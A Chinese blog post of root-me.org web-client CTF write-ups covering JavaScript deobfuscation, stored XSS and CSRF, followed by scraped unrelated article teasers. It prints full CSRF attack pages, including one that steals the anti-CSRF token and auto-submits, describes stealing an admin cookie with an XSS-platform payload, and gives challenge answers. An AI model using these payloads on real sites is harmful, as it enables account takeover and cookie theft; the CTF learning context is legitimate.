root-me web-client writeup

地址:www.root-me.org

  • HTML - disabled buttons

打开网页发现按钮不能按,查看源代码,有 'disabled' ,按F12进行元素修改,去掉 'disabled'然后提交即可

  • Javascript - Authentication

查看源码,在js里面可以找到密码

这个也是提交答案的密码

  • Javascript - Source

Ctrl+U 在源码里可找到密码

  • Javascript - Authentication 2

分析这段js即可,很简单就是将 'GOD:HIDDEN'用 ":"进行分割,GOD作为用户名,HIDDEN作为密码,所以最后提交HIDDEN即可

function connexion(){

    var username = prompt("Username :", "");

    var password = prompt("Password :", "");

    var TheLists = ["GOD:HIDDEN"];

    for (i = 0; i < TheLists.length; i++)

    {

        if (TheLists[i].indexOf(username) == 0)

        {

            var TheSplit = TheLists[i].split(":");

            var TheUsername = TheSplit[0];

            var ThePassword = TheSplit[1];

            if (username == TheUsername && password == ThePassword)

            {

                alert("Vous pouvez utiliser ce mot de passe pour valider ce challenge (en majuscules) / You can use this password to validate this challenge (uppercase)");

            }

        }

        else

        {

            alert("Nope, you're a naughty hacker.")

        }

    }

}

  • Javascript - Obfuscation 1

查看源代码,发现密码,进行urldecode解码即可

  • Javascript - Obfuscation 2

源码:var pass = unescape("unescape%28%22String.fromCharCode%2528104%252C68%252C117%252C102%252C106%252C100%252C107%252C105%252C49%252C53%252C54%2529%22%29");

两次urldecode,然后在控制台运行 document.write(String.fromCharCode(104,68,117,102,106,100,107,105,49,53,54))即可得到密码

  • Javascript - Native code

查看源码可以看到一段js变形的代码,这里需要用到firefox的一个deobfuscator插件。

成功添加之后,在firefox菜单的开发者选项之中可以看到一个"javascript反混淆器",点击打开,即可分析。

  • Javascript - Obfuscation 3

看源码,分析之后有这一串十六进制

\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30

转回字符之后是 55,56,54,79,115,69,114,116,107,49,50,控制台里运行document.write(String.fromCharCode(55,56,54,79,115,69,114,116,107,49,50))即可得到密码

  • XSS - Stored 1

无过滤,最简单的储存型xss,贴入某个xss平台的payload即可。

答案:cookie : ADMIN_COOKIE=NkI9qe4cdLIO2P7MIsWS8ofD6

  • CSRF - 0 protection

注册,登录之后有一个提交信息的地方。

让我们在message填入我们xss平台的payload验证漏洞。果然存在漏洞。

接下来就是构造恶意页面,先分析profile页面。

所以我们提交的参数值有username,status两个。最后构造的恶意页面如下,放在自己服务器上。

<!DOCTYPE html>

<html lang="en">

<head>

    <meta charset="UTF-8">

    <title>CSRF</title>

</head>

<body>

    <form name="csrf" action="http://challenge01.root-me.org/web-client/ch22/?action=profile" method="POST" enctype="multipart/form-data">

    <input type="hidden" name="username" value="deen" />

    <input type="hidden" name="status" value="on" />

    </form>

<script> document.csrf.submit()</script>

</body>

</html>

再message提交,

没有成功,是哪里出错了吗?求解。

  • Flash - Authentication

有大佬会吗,求教...

  • CSRF - token bypass

<!DOCTYPE html>

<html>

<head>

    <title>csrf</title>

</head>

<body onload="get()">

<form id="form-payload" action="?action=profile" method="POST" enctype="multipart/form-data">

  <input type="hidden" name="username" value="deen"/>

  <input type="hidden" name="status" value="on"/>

  <input type="hidden" id="forged-token" name="token" value=""/>

  <input type="submit" value="go"/>

</form>

<script>

var x = new XMLHttpRequest();

function get() {

  x.open("GET","?action=profile",true);

  x.send(null);

}

x.onreadystatechange = function() {

  if (x.readyState == XMLHttpRequest.DONE) {

    var token = x.responseText.match(/name="token" value="(.+)"/)[1];

    document.getElementById("forged-token").value = token;

    document.getElementById("form-payload").submit();

  }

}

</script>

</body>

</html>

  • Javascript - Obfuscation 4

源代码如下:

var ð = "\x71\x11\x24\x59\x8d\x6d\x71\x11\x35\x16\x8c\x6d\x71\x0d\x39\x47\x1f\x36\xf1\x2f\x39\x36\x8e\x3c\x4b\x39\x35\x12\x87\x7c\xa3\x10\x74\x58\x16\xc7\x71\x56\x68\x51\x2c\x8c\x73\x45\x32\x5b\x8c\x2a\xf1\x2f\x3f\x57\x6e\x04\x3d\x16\x75\x67\x16\x4f\x6d\x1c\x6e\x40\x01\x36\x93\x59\x33\x56\x04\x3e\x7b\x3a\x70\x50\x16\x04\x3d\x18\x73\x37\xac\x24\xe1\x56\x62\x5b\x8c\x2a\xf1\x45\x7f\x86\x07\x3e\x63\x47";

function _(x, y) {

  return x ^ y;

}

function __(y) {

  var z = 0;

  for (var i = 0; i < y; i++) {

    z += Math.pow(2, i);

  }

  return z;

}

function ___(y) {

  var z = 0;

  for (var i = 8 - y; i < 8; i++) {

    z += Math.pow(2, i);

  }

  return z

}

function ____(x, y) {

  y = y % 8;

  Ï = __(y);

  Ï = (x & Ï) << (8 - y);

  return (Ï) + (x >> y);

}

function _____(x, y) {

  y = y % 8;

  Ï = ___(y);

  Ï = (x & Ï) >> (8 - y);

  return ((Ï) + (x << y)) & 0x00ff;

}

function ______(x, y) {

  return _____(x, y)

}

function _______(_________, key) {

  ________ = "";

  ________2 = "";

  for (var i = 0; i < _________.length; i++) {

    c = _________.charCodeAt(i);

    if (i != 0) {

      t = ________.charCodeAt(i - 1) % 2;

      switch (t) {

        case 0:

          cr = _(c, key.charCodeAt(i % key.length));

          break;

        case 1:

          cr = ______(c, key.charCodeAt(i % key.length));

          break;

      }

    } else {

      cr = _(c, key.charCodeAt(i % key.length));

    }

    ________ += String.fromCharCode(cr);

  }

  return ________;

}

function __________(þ) {

  var ŋ = 0;

  for (var i = 0; i < þ.length; i++) {

    ŋ += þ["charCodeAt"](i)

  }

  if (ŋ == 8932) {

    var ç = window.open("", "", "\x77\x69\x64\x74\x68\x3d\x33\x30\x30\x2c\x68\x65\x69\x67\x68\x74\x3d\x32\x20\x30");

    ç.document.write(þ)

  } else {

    alert("Mauvais mot de passe!")

  }

}

__________(_______(ð, prompt("Mot de passe?")));

这代码看得我真蛋疼...美化修改相关变量和函数名之后的代码如下:

var text = "\x71\x11\x24\x59\x8d\x6d\x71\x11\x35\x16\x8c\x6d\x71\x0d\x39\x47\x1f\x36\xf1\x2f\x39\x36\x8e\x3c\x4b\x39\x35\x12\x87\x7c\xa3\x10\x74\x58\x16\xc7\x71\x56\x68\x51\x2c\x8c\x73\x45\x32\x5b\x8c\x2a\xf1\x2f\x3f\x57\x6e\x04\x3d\x16\x75\x67\x16\x4f\x6d\x1c\x6e\x40\x01\x36\x93\x59\x33\x56\x04\x3e\x7b\x3a\x70\x50\x16\x04\x3d\x18\x73\x37\xac\x24\xe1\x56\x62\x5b\x8c\x2a\xf1\x45\x7f\x86\x07\x3e\x63\x47";

function a(x, y) {

  return x ^ y;

}

function b(y) {

  var z = 0;

  for (var i = 0; i < y; i++) {

    z += Math.pow(2, i);

  }

  return z;

}

function C(y) {

  var z = 0;

  for (var i = 8 - y; i < 8; i++) {

    z += Math.pow(2, i);

  }

  return z

}

function d(x, y) {

  y = y % 8;

  n = b(y);

  n = (x & n) << (8 - y);

  return (n) + (x >> y);

}

function e(x, y) {

  y = y % 8;

  n = C(y);

  n = (x & n) >> (8 - y);

  return ((n) + (x << y)) & 0x00ff;

}

function f(x, y) {

  return e(x, y)

}

function g(x, key) {

  y = "";

  z = "";

  for (var i = 0; i < x.length; i++) {

    c = x.charCodeAt(i);

    if (i != 0) {

      t = y.charCodeAt(i - 1) % 2;

      switch (t) {

        case 0:

          cr = a(c, key.charCodeAt(i % key.length));

          break;

        case 1:

          cr = f(c, key.charCodeAt(i % key.length));

          break;

      }

    } else {

      cr = a(c, key.charCodeAt(i % key.length));

    }

    y += String.fromCharCode(cr);

  }

  return y;

}

function m(pass) {

  var ŋ = 0;

  for (var i = 0; i < pass.length; i++) {

    ŋ += pass["charCodeAt"](i)

  }

  if (ŋ == 8932) {

    var ç = window.open("", "", "\x77\x69\x64\x74\x68\x3d\x33\x30\x30\x2c\x68\x65\x69\x67\x68\x74\x3d\x32\x20\x30");

    ç.document.write(pass)

  } else {

    alert("Mauvais mot de passe!")

  }

}

m(g(text, prompt("Mot de passe?")));

分析:

  1. m函数是对密码pass进行验证,密码正确的条件是pass所有字符的ascii值加起来为8932

  2. 关键在于g函数,g函数是对输入处理的核心函数。g函数有两个参数,一个已知,一个需要我们输入,返回值y就是我们要的密码。

    • 我曹...这要怎么个逆法...这嵌套调用想死...看了半天不会啊...aaa...

XSS - Stored 2

存储型xss,目标还是盗用管理员cookie,应该是有过滤的,先找输出点,然后fuzz

首先测试尖括号<>,发现被实体化了

[root-me](web-client)write up 一个大坑怎么填啊的更多相关文章

  1. 在一个空ASP.NET Web项目上创建一个ASP.NET Web API 2.0应用

    由于ASP.NET Web API具有与ASP.NET MVC类似的编程方式,再加上目前市面上专门介绍ASP.NET Web API 的书籍少之又少(我们看到的相关内容往往是某本介绍ASP.NET M ...

  2. ambari关于ranger的一个大坑----端口永远是3306,需要手动修改

    ambari关于ranger的一个大坑----端口永远是3306 这个坑是我在搭建ambari环境的时候发现的,我并没有找到原因,求助同事,然后一步步循着蛛丝马迹和试探,终于解决了,然而也揭露了amb ...

  3. VMware客户端vSphere Web Client新建虚拟机

    1.说明 vSphere Web Client是为管理员提供的一款通用的. 基于浏览器的VMware管理工具, 能够监控并管理VMware基础设施. 由于需要登录的宿主机安装的是ESXi-6.5.0, ...

  4. 虚拟化之vmware-vsphere (web) client

    两种客户端 vsphere client 配置>软件>高级设置里的变量 uservars.supressshellwarning=1 vsphere web client 安装完vSphe ...

  5. Web框架本质及第一个Django实例 Web框架

    Web框架本质及第一个Django实例   Web框架本质 我们可以这样理解:所有的Web应用本质上就是一个socket服务端,而用户的浏览器就是一个socket客户端. 这样我们就可以自己实现Web ...

  6. vsphere web client 使用中文的解决办法

    1. 很多网站这么说的: vsphere web client的默认URL为:https://hostname:9443/vsphere-client 可以在URL后面加上一个参数来指定区域语言 英语 ...

  7. vSphere Web Client 6.5 如何上传ISO文件

    vSphere Web Client 6.5 如何上传ISO文件? 1,先开启SSH功能. WEB登陆管理端,选中一台主机,配置-安全配置文件-服务编辑-SSH项-起动. 2,用SFTP上传ISO文件 ...

  8. OpenERP Web Client设置闲置有效时间

    在Web Client端使用OpenERP时,默认的cookie有效时间是浏览器的当前作业窗口,这样就是说只要你不关闭浏览器,不管闲置多长时间,当前的连线都是有效的.这样就会有安全问题,如果你忘了登出 ...

  9. vSphere Web Client使用指南之安装配置

    vSphere Web Client使用指南之安装配置 vSphere Web Client是为忙碌的管理员提供的一款通用的.基于浏览器的VMware管理工具,能够监控并管理VMware基础设施.在摆 ...

随机推荐

  1. mysql查询的时候没有加order by时的默认排序问题

    有时候我们执行MySQL查询的时候,查询语句没有加order by,但是发现结果总是已经按照id排序好了的,难道MySQL就是为了好看给我们排序 如上图数据,是我查询了语句 SELECT * from ...

  2. C++ 反汇编:关于函数调用约定

    函数是任何一门高级语言中必须要存在的,使用函数式编程可以让程序可读性更高,充分发挥了模块化设计思想的精髓,今天我将带大家一起来探索函数的实现机理,探索编译器到底是如何对函数这个关键字进行实现的,并使用 ...

  3. 期中架构&防火墙¥四表五链

    今日内容 架构图 包过滤防火墙 Iptables 新建虚拟机 内容详细 一.架构图 用户通过域名访问一个网站类比开车去饭店用餐 访问网站的流程 1.浏览器输入网站的域名(www.baidu.com), ...

  4. Mybatis结果映射器resultMap的基本用法

    <mapper namespace="全局唯一的名称空间"> <resultMap id="本namespace下唯一" type=" ...

  5. 如何在win10系统上安装linux子系统

    对于软件开发人员来说,linux基本上是一个绕不过去的槛. 因为工作经常要用到linux,电脑用纯linux还是windows + 虚拟机装linux,我一直纠结. 如果装个纯linux,则一些win ...

  6. C#编程学习(一)

    1.1 开始在Visual Studio 2013环境中编程 控制台应用程序是在命令提示符窗口而非图形用户界面(GUI)中运行的应用程序. 集成开发环境(Integrated Development  ...

  7. 【C# 】继承

    背景..什么是继承? 「继承」是对象导向编程的其中一个基本属性. 它可让您定义子类,重复使用(继承).扩充或修改父类别行为. 其成员可供继承的类别称为基底类别. 继承基底类别成员的类别则称为「衍生类别 ...

  8. 2019CCPC Final K. Russian Dolls on the Christmas Tree

    题目大意 一棵 \(n(1\leq n\leq 2\times 10^5)\) 个节点以 \(1\) 为根的树,分别求以 \(1\sim n\) 为根的子树中有多少个节点编号连续的段. \(T(1\l ...

  9. 列表视图ListView

    依然是一个listView的Java文件 1 public class ListViewActivity extends Activity { 2 private ListView lv1; 3 @O ...

  10. WIN10:IE浏览器的默认主页以及通过链接搜索的默认引擎

    主页设置: 地址栏搜索引擎: